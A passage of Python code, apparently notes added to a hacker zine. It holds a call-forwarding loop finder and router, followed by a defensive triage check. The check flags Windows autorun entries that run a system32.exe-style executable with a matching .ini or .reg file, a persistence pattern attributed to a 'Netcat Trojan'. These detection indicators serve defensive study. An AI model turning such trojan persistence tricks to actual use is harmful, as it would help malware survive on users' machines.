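    """Return every forwarding cycle, rotated to start at its lowest number."""
    first_seen = {}  # number -> id of the walk that first reached it
    loops = []
    for walk_id, start in enumerate(sorted(forwards)):
        path, current = [], start
        while current in forwards and current not in first_seen:
            first_seen[current] = walk_id
            path.append(current)
            current = forwards[current]
        # Ending on a number first reached during this walk closes a new cycle.
        if first_seen.get(current) == walk_id:
            cycle = path[path.index(current):]
            pivot = cycle.index(min(cycle))
            loops.append(cycle[pivot:] + cycle[:pivot])
    return loops


def route(forwards, dialed, max_hops=MAX_HOPS):
    """Simulate one call; refuse it instead of forwarding without end."""
    path = [dialed]
    while path[-1] in forwards:
        target = forwards[path[-1]]
        if target in path:
            return "rejected_loop", path
        if len(path) - 1 >= max_hops:
            return "rejected_hop_limit", path
        path.append(target)
    return "delivered", path


if __name__ == "__main__":
    print(find_loops(SAMPLE))
    print(route(SAMPLE, "555-0150"))
```

find_loops is the offline audit over the whole table; route is the per-call check, which still stops a call when the ring is longer than the audit window or was built after the last audit.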
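
Added example, not part of the original zine: a triage check for the start-up pattern described in 'Netcat Trojan Update', flagging an autorun entry whose executable is named after a system directory (system32.exe) and noting a same-named .ini or .reg file beside it. The article names only the three files; the registry key, install path, sample entries and function names are constructed assumptions.

```python
import ntpath
import re

# Added example. system32.exe / .ini / .reg are the file names the article
# gives; the key, paths and entries below are constructed for illustration.
DIR_LIKE_STEMS = {"system32", "system", "windows", "winnt"}
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"  # assumed key

AUTORUNS = [  # (key, value name, command line), constructed
    (RUN_KEY, "SystemTray", "SysTray.Exe"),
    (RUN_KEY, "LoadPowerProfile", "Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"),
    (RUN_KEY, "system32", r"C:\WINDOWS\system32.exe"),
]
FILES = [  # constructed directory listing
    r"C:\WINDOWS\system32.exe",
    r"C:\WINDOWS\system32.ini",
    r"C:\WINDOWS\SYSTEM\systray.exe",
]

# Heuristic: quoted path, else text up to the first ".exe", else first token.
IMAGE_RE = re.compile(r'^\s*(?:"([^"]+)"|(.+?\.exe)(?=\s|$)|(\S+))', re.I)


def image_path(command):
    """Extract the executable path from an autorun command line."""
    match = IMAGE_RE.match(command)
    return next(g for g in match.groups() if g) if match else ""


def triage(autoruns, files):
    """Return (value name, image, reasons) for each suspicious autorun."""
    present = {f.lower() for f in files}
    hits = []
    for _key, name, command in autoruns:
        image = image_path(command)
        base, ext = ntpath.splitext(image.lower())
        # A program file that borrows a system directory's name is the signal.
        if ext != ".exe" or ntpath.basename(base) not in DIR_LIKE_STEMS:
            continue
        reasons = ["executable named after a system directory"]
        reasons += [f"companion {ntpath.basename(base)}{suffix} present"
                    for suffix in (".ini", ".reg") if base + suffix in present]
        hits.append((name, image, reasons))
    return hits
```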